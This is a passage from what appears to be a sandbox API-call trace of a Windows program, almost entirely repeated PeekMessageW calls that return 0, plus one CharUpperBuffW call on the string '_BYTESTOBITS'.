returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.358] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.359] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.360] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.361] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.361] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.362] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.365] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: 